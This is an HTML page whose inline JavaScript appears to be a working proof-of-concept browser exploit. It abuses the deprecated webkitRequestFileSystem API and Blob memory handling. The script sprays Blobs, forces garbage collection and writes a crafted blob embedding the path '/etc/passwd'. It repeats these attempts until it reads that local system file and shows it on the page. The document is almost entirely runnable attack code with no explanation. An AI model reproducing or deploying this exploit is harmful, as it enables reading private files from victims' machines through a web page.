<html>
|
<head>
|
<script>
|
|
function error(e) {
|
console.log('error:');
|
console.log(e);
|
}
|
|
function checkHavePasswd(result) {
|
if (result && result.length) {
|
console.log('got something!');
|
document.getElementById('passwd').innerHTML = '<pre>' + result + '</pre>';
|
} else if (blobIndex) {
|
iteration();
|
} else {
|
console.log('giving up');
|
return;
|
}
|
}
|
|
function tryReadPasswd() {
|
console.log('tryReadPasswd');
|
|
var reader = new FileReader();
|
|
reader.onerror = error;
|
reader.onloadend = function readComplete() {
|
checkHavePasswd(reader.result);
|
};
|
|
reader.readAsText(passwdBlob);
|
}
|
|
function corruptPasswdBlob() {
|
console.log('corruptPasswdBlob');
|
|
dir.getFile(
|
'out',
|
{create: true, exclusive: true},
|
function fileCreated(file) {
|
file.createWriter(
|
function writerCreated(writer) {
|
writer.onerror = error;
|
writer.onwriteend = function didWrite() {
|
file.remove(
|
function didRemove() {
|
tryReadPasswd();
|
},
|
error);
|
};
|
writer.write(badBlob);
|
},
|
error);
|
},
|
error);
|
}
|
|
function gc() {
|
var q = [];
|
for (var i=0; i<1000000; i++) {
|
q.push(new Array(3));
|
}
|
}
|
|
function iteration() {
|
console.log('iteration ' + (100 - blobIndex) / 2);
|
|
blobIndex -= 2;
|
delete blobs[blobIndex + 0];
|
delete blobs[blobIndex + 1];
|
gc();
|
window.passwdBlob = new Blob([file2Blob]);
|
corruptPasswdBlob();
|
}
|
|
function prepareIterations() {
|
console.log('prepareIterations');
|
|
window.blobs = new Array();
|
window.blobIndex = 100;
|
var buf = new ArrayBuffer(0x8000);
|
var bytes = new Uint8Array(buf);
|
|
for (var i=0; i<100; i++)
|
blobs[i] = new Blob([bytes]);
|
|
iteration();
|
}
|
|
function getFiles() {
|
file1.file(
|
function gotFile1(file1Blob) {
|
file2.file(
|
function gotFile2(file2Blob) {
|
window.file1Blob = file1Blob;
|
window.file2Blob = file2Blob;
|
window.badBlob = new Blob([file1Blob, file2Blob]);
|
prepareIterations();
|
},
|
error);
|
},
|
error);
|
}
|
|
function filesCreated() {
|
console.log('filesCreated');
|
|
var payload =
|
'\x0b\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00' +
|
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/etc/passwd\x00'
|
|
var buf = new ArrayBuffer(0x8024);
|
var bytes = new Uint8Array(buf);
|
for (var i = 0; i < payload.length; i++)
|
bytes[0x8000 + i] = payload.charCodeAt(i);
|
var blob = new Blob([bytes]);
|
|
file1.createWriter(
|
function writerCreated(writer) {
|
writer.onerror = error;
|
writer.onwriteend = function(e) {
|
getFiles();
|
};
|
writer.write(blob);
|
},
|
error);
|
}
|
|
function openFile(filename) {
|
console.log('openFile ' + filename);
|
|
if (filename == 'file1')
|
done = function(file) { window.file1 = file; openFile('file2') }
|
else
|
done = function(file) { window.file2 = file; filesCreated(); };
|
|
dir.getFile(filename, {create: true, exclusive: true}, done, error);
|
}
|
|
function openWorkDir() {
|
fs.root.getDirectory(
|
'work',
|
{create: true, exclusive: true},
|
function dirCreated(dir) {
|
console.log('work dir created');
|
window.dir = dir;
|
openFile('file1');
|
},
|
error);
|
}
|
|
function removeWorkDir() {
|
fs.root.getDirectory(
|
'work',
|
{create: false},
|
function dirExists(dir) {
|
console.log('removing work dir');
|
dir.removeRecursively(
|
function dirRemoved() {
|
openWorkDir();
|
},
|
error);
|
},
|
function dirDoesntExist(e) {
|
openWorkDir();
|
});
|
}
|
|
function run() {
|
console.log('run');
|
window.webkitRequestFileSystem(window.TEMPORARY,
|
0x1000000,
|
function(fs) {
|
window.fs = fs;
|
removeWorkDir();
|
},
|
error);
|
}
|
|
run();
|
|
</script>
|
</head>
|
<body>
|
<div id="passwd"></div>
|
</body>
|
</html>
|